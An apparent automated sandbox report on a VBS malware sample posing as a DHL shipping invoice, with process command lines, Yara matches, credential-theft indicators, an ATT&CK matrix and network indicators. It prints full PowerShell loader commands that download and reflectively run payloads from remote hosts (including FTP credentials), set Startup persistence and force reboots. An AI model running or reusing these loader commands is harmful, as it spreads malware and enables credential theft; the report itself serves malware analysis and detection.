                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavagiamg' + [char]66 + 'jageacw' + [char]66 + 'lac4ayw' + [char]66 + 'vag0alw' + [char]66 + 'jagwayq' + [char]66 + 'zahmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' 
 + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauahoaea' + [char]66 + 'iagsabqakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahoaea' + [char]66 + 'iagsabqakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagahoaea' + [char]66 + 'iagsabqakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + '6ahgayg' + [char]66 + 'rag0ajaa7ackaiaanahqaea' + [char]66 + '0ac4amqawaewata' + [char]66 + 'eac8amqawac8acg' + [char]66 + 'lahqaca' + [char]66 + '5ahiayw' + [char]66 + 'wafualw' + [char]66 + 'yagialg' + [char]66 + 'tag8aywauahqayq' + [char]66 + 'yagiadg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$rrlqq = ($rrlqq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$rrlqq = ($rrlqq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$yzdrg = (new-object net.webclient);$yzdrg.encoding = [system.text.encoding]::utf8;$yzdrg.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$mkbxz.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lbczsg = $mkbxz.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$mkbxz.dispose();$mkbxz = (new-object net.webclient);$mkbxz.encoding = [system.text.encoding]::utf8;$lbczsg = $mkbxz.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhlshippinginvoicesawbbl000000000102220242247.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' 
, 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huupx , 'd d1d' ) );};"
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager32\cmd.exeiF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_10002933 cpuid 21_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,23_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,23_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,23_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,23_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,23_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,23_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,23_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,23_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,23_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoA,23_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,23_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,23_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 21_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0041B69E GetUserNameW,23_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 23_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_0044942D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 29_2_0041739B GetVersionExW,29_2_0041739B
                    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 23_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \key3.db 23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: ESMTPPassword30_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword30_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword30_2_00402DB3

                    Remote Access Functionality

                    Source: Yara match, File source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara match, File source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: cmd.exe 23_2_0040569A
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information321
                    Scripting
                    Valid Accounts11
                    Native API
                    321
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts32
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    21
                    Registry Run Keys / Startup Folder
                    1
                    Windows Service
                    2
                    Software Packing
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script322
                    Process Injection
                    1
                    DLL Side-Loading
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                    Registry Run Keys / Startup Folder
                    1
                    Bypass User Account Control
                    Cached Domain Credentials131
                    Security Software Discovery
                    VNCGUI Input Capture213
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Virtualization/Sandbox Evasion
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation
                    Network Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd322
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior graph nodes and edges (node id, label, parent->child):
                    2 Behavior Graph ID: 1539088 Sample: DHLShippingInvoicesAwbBL000... Startdate: 22/10/2024 Architecture: WINDOWS Score: 100
                    90 pastebin.com 2->90
                    92 paste.ee 2->92
                    94 5 other IPs or domains 2->94
                    106 Multi AV Scanner detection for domain / URL 2->106
                    108 Suricata IDS alerts for network traffic 2->108
                    110 Found malware configuration 2->110
                    114 18 other signatures 2->114
                    11 wscript.exe 1 2->11 started
                    14 cmd.exe 2->14 started
                    16 cmd.exe 2->16 started
                    18 2 other processes 2->18
                    112 Connects to a pastebin service (likely for C&C) 92->112
                    140 VBScript performs obfuscated calls to suspicious functions 11->140
                    142 Suspicious powershell command line found 11->142
                    144 Wscript starts Powershell (via cmd or directly) 11->144
                    146 2 other signatures 11->146
                    20 powershell.exe 7 11->20 started
                    23 powershell.exe 14->23 started
                    25 conhost.exe 14->25 started
                    27 powershell.exe 16->27 started
                    29 conhost.exe 16->29 started
                    31 powershell.exe 18->31 started
                    33 powershell.exe 18->33 started
                    35 conhost.exe 18->35 started
                    37 conhost.exe 18->37 started
                    116 Suspicious powershell command line found 20->116
                    118 Self deletion via cmd or bat file 20->118
                    120 Tries to download and execute files (via powershell) 20->120
                    126 3 other signatures 20->126
                    39 powershell.exe 14 19 20->39 started
                    44 conhost.exe 20->44 started
                    122 Writes to foreign memory regions 23->122
                    124 Injects a PE file into a foreign process 23->124
                    46 conhost.exe 23->46 started
                    48 AddInProcess32.exe 23->48 started
                    50 AddInProcess32.exe 23->50 started
                    52 conhost.exe 27->52 started
                    54 AddInProcess32.exe 27->54 started
                    56 2 other processes 31->56
                    58 2 other processes 33->58
                    100 desckvbrat.com.br 191.252.83.213, 21, 49730, 49731 LocawebServicosdeInternetSABR Brazil 39->100
                    102 b2case.com 188.114.96.3, 443, 49732, 49734 CLOUDFLARENETUS European Union 39->102
                    88 C:\Users\user\AppData\Roaming\...\qkbrq.ps1, Unicode 39->88 dropped
                    136 Self deletion via cmd or bat file 39->136
                    138 Adds a directory exclusion to Windows Defender 39->138
                    60 powershell.exe 39->60 started
                    64 powershell.exe 1 11 39->64 started
                    66 powershell.exe 1 11 39->66 started
                    68 4 other processes 39->68
                    104 pastebin.com 104.20.4.235, 443, 49744, 49746 CLOUDFLARENETUS United States 60->104
                    148 Writes to foreign memory regions 60->148
                    150 Injects a PE file into a foreign process 60->150
                    70 AddInProcess32.exe 60->70 started
                    152 Creates autostart registry keys with suspicious values (likely registry only malware) 64->152
                    154 Creates multiple autostart registry keys 64->154
                    156 Suspicious powershell command line found 68->156
                    158 Wscript starts Powershell (via cmd or directly) 68->158
                    160 Loading BitLocker PowerShell Module 68->160
                    75 WmiPrvSE.exe 68->75 started
                    96 iwarsut775laudrye001.duckdns.org 43.226.229.232, 49745, 49747, 57484 SOFTLAYERUS Hong Kong 70->96
                    98 geoplugin.net 178.237.33.50, 49748, 80 ATOM86-ASATOM86NL Netherlands 70->98
                    86 C:\Users\user\AppData\Roaming\kanspt.dat, data 70->86 dropped
                    128 Contains functionality to bypass UAC (CMSTPLUA) 70->128
                    130 Tries to steal Mail credentials (via file registry) 70->130
                    132 Contains functionality to change the wallpaper 70->132
                    134 6 other signatures 70->134
                    77 AddInProcess32.exe 70->77 started
                    80 AddInProcess32.exe 70->80 started
                    82 AddInProcess32.exe 70->82 started
                    84 AddInProcess32.exe 70->84 started
                    162 Tries to steal Instant Messenger accounts or passwords 77->162
                    164 Tries to steal Mail credentials (via file / registry access) 77->164
                    166 Tries to harvest and steal browser information (history, passwords, etc) 80->166

                    Source | Detection | Scanner | Label | Link
                    DHLShippingInvoicesAwbBL000000000102220242247.vbs | 0% | ReversingLabs | - | -
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    paste.ee | 1% | Virustotal | - | Browse
                    geoplugin.net | 0% | Virustotal | - | Browse
                    desckvbrat.com.br | 7% | Virustotal | - | Browse
                    b2case.com | 0% | Virustotal | - | Browse
                    Source | Detection | Scanner | Label | Link
                    https://contoso.com/License | 0% | URL Reputation | safe | -
                    https://aka.ms/pscore6 | 0% | URL Reputation | safe | -
                    http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe | -
                    https://contoso.com/ | 0% | URL Reputation | safe | -
                    https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
                    https://oneget.orgX | 0% | URL Reputation | safe | -
                    https://login.yahoo.com/config/login | 0% | URL Reputation | safe | -
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
                    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | -
                    http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe | -
                    https://go.micro | 0% | URL Reputation | safe | -
                    http://www.imvu.com | 0% | URL Reputation | safe | -
                    https://contoso.com/Icon | 0% | URL Reputation | safe | -
